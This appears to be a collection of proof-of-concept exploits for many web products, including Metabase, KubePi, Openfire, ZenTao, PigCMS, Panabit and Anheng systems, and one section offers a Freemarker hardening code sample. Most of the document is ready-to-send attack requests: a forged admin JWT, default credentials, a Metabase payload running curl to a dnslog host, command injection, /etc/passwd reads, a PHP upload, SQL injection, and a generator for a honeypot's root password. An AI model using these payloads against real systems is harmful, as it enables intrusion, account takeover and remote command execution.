Jeecg-Boot Freemarker Template Injection Vulnerability (suspected)
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025","id":"1"}

Vulnerability impact
1. If exploited by an attacker, it can directly yield a shell (getshell);
2. If exploited by an attacker, it can be used for internal network reconnaissance and scanning of internal hosts;
3. If exploited by an attacker, it can be used to attack applications running on the internal network or locally;
4. If exploited by an attacker, it can be used as a pivot for further attacks;
Remediation
Jeecg has not yet released an official fix, so the vulnerability cannot be fixed by upgrading JeecgBoot. Recommendation:
1. Temporarily disable Freemarker's high-risk code-execution classes, e.g. freemarker.template.utility.Execute (there are many FTL exploitation techniques, so assess your own exposure)
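One way to apply recommendation 1 in a Freemarker-based Java application, as an added example that is not Jeecg's code: set Freemarker's TemplateClassResolver so the ?new built-in can no longer instantiate freemarker.template.utility.Execute. It assumes Freemarker 2.3.x on the classpath; the class SaferFreemarkerConfig, its methods and the probe template are hypothetical.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.util.HashMap;

import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

public class SaferFreemarkerConfig {
    // Hardened configuration (hypothetical helper): SAFER_RESOLVER refuses to
    // instantiate Execute, ObjectConstructor and JythonRuntime through ?new,
    // while other TemplateModel classes remain constructible.
    public static Configuration hardened() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
        return cfg;
    }

    // Stricter variant: ?new is disabled entirely. Prefer this when templates
    // never legitimately need to construct Java objects.
    public static Configuration noNewBuiltin() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        return cfg;
    }

    // Renders a template string with an empty data model and reports whether
    // Freemarker rejected it (true) or processed it (false).
    static boolean rejects(Configuration cfg, String ftl) throws Exception {
        Template t = new Template("probe", new StringReader(ftl), cfg);
        try {
            t.process(new HashMap<String, Object>(), new StringWriter());
            return false;
        } catch (TemplateException e) {
            System.out.println("rejected: " + e.getMessage().split("\n")[0]);
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed probe referencing the class named in the recommendation;
        // with either hardened resolver it must be refused, never instantiated.
        String probe = "<#assign x = \"freemarker.template.utility.Execute\"?new()>ok";
        System.out.println("SAFER_RESOLVER blocks Execute: " + rejects(hardened(), probe));
        System.out.println("ALLOWS_NOTHING blocks ?new:    " + rejects(noNewBuiltin(), probe));
    }
}
```

The setting belongs wherever the application builds its Freemarker Configuration; keeping a check like rejects() in a test suite stops the mitigation from silently regressing.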

KubePi JwtSigKey Login Bypass Vulnerability CVE-2023-22463
Vulnerability description
KubePi contains a hard-coded JWT signing key; using the hard-coded value an attacker can obtain backend administrative privileges on the server and add arbitrary users
Affected
KubePi
Network mapping (fingerprint)
"KubePi"
CVE-2023-22463 reproduction
POST /kubepi/api/v1/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8
{
  "authenticate": {
       "password": "{{randstr}}"
  },
  "email": "{{randstr}}@qq.com",
  "isAdmin": true,
  "mfa": {
          "enable": false
   },
  "name": "{{randstr}}",
  "nickName": "{{randstr}}",
  "roles": [
       "Supper User"
  ]
}

Kuboard Default Credentials
Vulnerability description:
Kuboard is a free graphical management tool for Kubernetes that aims to help users quickly deploy microservices on Kubernetes. Kuboard ships with default credentials, which can be used to log in to Kuboard and manage the Kubernetes cluster.
admin/kuboard123

Metabase validate Remote Command Execution Vulnerability CVE-2023-38646
Vulnerability description
Metabase is an open-source data analysis and visualization tool that helps users easily connect to a variety of data sources, including databases, cloud services and APIs, and then query, analyze and visualize the data through a graphical interface. An authenticated remote attacker exploiting this vulnerability can execute arbitrary commands on the server with the privileges of the Metabase server process
Affected
Metabase
Network mapping (fingerprint)
app="Metabase"
CVE-2023-38646 reproduction
POC
Send a GET request to /api/session/properties
The response contains a setup-token field
Then use the obtained token to send the following POST request:
POST /api/setup/validate HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 812
{
    "token": "获取的token",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

Milesight VPN server.js Arbitrary File Read Vulnerability
GET /../etc/passwd HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded

Nacos-Sync Unauthorized Access Vulnerability
https://xxx.xxx.xxx/#/serviceSync

Openfire Authentication Bypass Vulnerability (CVE-2023-32315)
GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1

Panabit iXCache Gateway RCE Vulnerability CVE-2023-38646
POST /cgi-bin/Maintain/date_config HTTP/1.1
Host: 127.0.0.1:8443
Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp

1Panel loadfile Backend File Read Vulnerability
For details see: https://zkunu7syvm.feishu.cn/docx/JmKgddUcMo4Rt2xLys4c4lN2nbc
POST /api/v1/file/loadfile HTTP/1.1
Host: [your hostname or IP address]
Content-Type: application/json
Content-Length: [request body length in bytes]
{"paht":"/etc/passwd"}

PigCMS action_flashUpload Arbitrary File Upload Vulnerability
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa
/cms/upload/images/2023/08/11/1691722887xXbx.php

QAX-Vpn x Traversal and Arbitrary Account Password Change Vulnerability
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=1
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=3 cookie: admin id=1; gw admin ticket=1;

Yakit Arbitrary File Read
For details see the original article, which reproduces the issue with screenshots
Original link: https://mp.weixin.qq.com/s/IQekVs-UU2Slh6V_frpaug
Preface:
Yakit is a BurpSuite alternative that has emerged in recent years. The difference from Burp is that you can forward a packet without configuring the IP, port and protocol, but Yakit feels sluggish when running and is far less smooth than Burp. Recently Yakit was found to have an arbitrary file read vulnerability: by embedding JS code in a web page, an attacker can read files on the Yakit user's device.
Affected versions:
Engine version < Yaklang 1.2.4-sp2
Preconditions:
Yakit's MITM proxy is in use and at least one plugin is enabled
Payload:
Listener script
#!/usr/bin/env python3
import socket

# Listen address and port
host = '0.0.0.0'
port = 23800

# Create the server socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

# Bind and listen on the port
server.bind((host, port))
server.listen()

# Accept connections and log the incoming requests
print("Listening...")
while True:
    # Accept a client connection
    client, address = server.accept()
    print(f"Connected by {address}")
    # Read the client's request data
    request = ''
    while True:
        input_data = client.recv(1024).decode('utf-8', errors='replace')
        request += input_data
        if len(input_data) < 1024:
            break
    # Extract and print the request headers
    headers = request.split('\n')
    print("Received headers:")
    for header in headers:
        print(header)
    # Close the client connection
    client.close()

Reproduction:
Create an HTML page and insert the payload
Enable the MITM proxy and visit the page without enabling any plugin:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wMXX7dh9j86aZ7JA0WMoxwHSDdAwnMVSZLoF09zuiamTpkibBtLto8y8KA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
Enable the MITM proxy together with a plugin, then visit the page:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wM1RvwO5nnYhpX3aKZeCDdziaCEcOSDfbIcu2wNe27x7aTsPgBXo8KTsQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
Principle: by default Yakit does not parse fuzztags in traffic passing through the MITM proxy, but it does parse them when the traffic passes through a plugin, which is also the constraint on exploitation.

Anheng Honeypot 2.0.11 Privilege Escalation Vulnerability
package main

import (
	"crypto/sha256"
	"fmt"
	"time"
)

// Derives the day's root and operator passwords: the first 16 hex characters
// of sha256(fixed salt + today's date + role name).
func main() {
	date := time.Now().Format("2006-01-02")
	rootInput := "1234567890!@#$%^&*()" + date + "root"
	rootSum := sha256.Sum256([]byte(rootInput))
	rootPasswd := fmt.Sprintf("%x", rootSum)[:16]
	operatorInput := "1234567890!@#$%^&*()" + date + "operator"
	operatorSum := sha256.Sum256([]byte(operatorInput))
	operatorPasswd := fmt.Sprintf("%x", operatorSum)[:16]
	fmt.Printf("[+] root     passwd ->  %s\n", rootPasswd)
	fmt.Printf("[+] operator passwd ->  %s\n", operatorPasswd)
}

Anheng Mingyu Operations Audit and Risk Control System (Bastion Host) Arbitrary User Registration
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>XX.XX.XX.XX</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Deptadmin@123</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>

ZenTao 16.5 router.class.php SQL Injection Vulnerability
POST /user-login.html

account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23

ZenTao v18.0-v18.3 Backend Command Execution
This PoC comes from: https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa
Extraction code: zyxa
See the link for details
POC:
POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Origin: http://127.0.0.1
Connection: close
Cookie: zentaosid=dhjpu2i3g51l6j5eba85aql27f; lang=zhcn; device=desktop; theme=default; tab=qa; windowWidth=1632; windowHeight=783
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za

Chenxin Jingyun Endpoint Security Management System login SQL Injection Vulnerability
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='            
        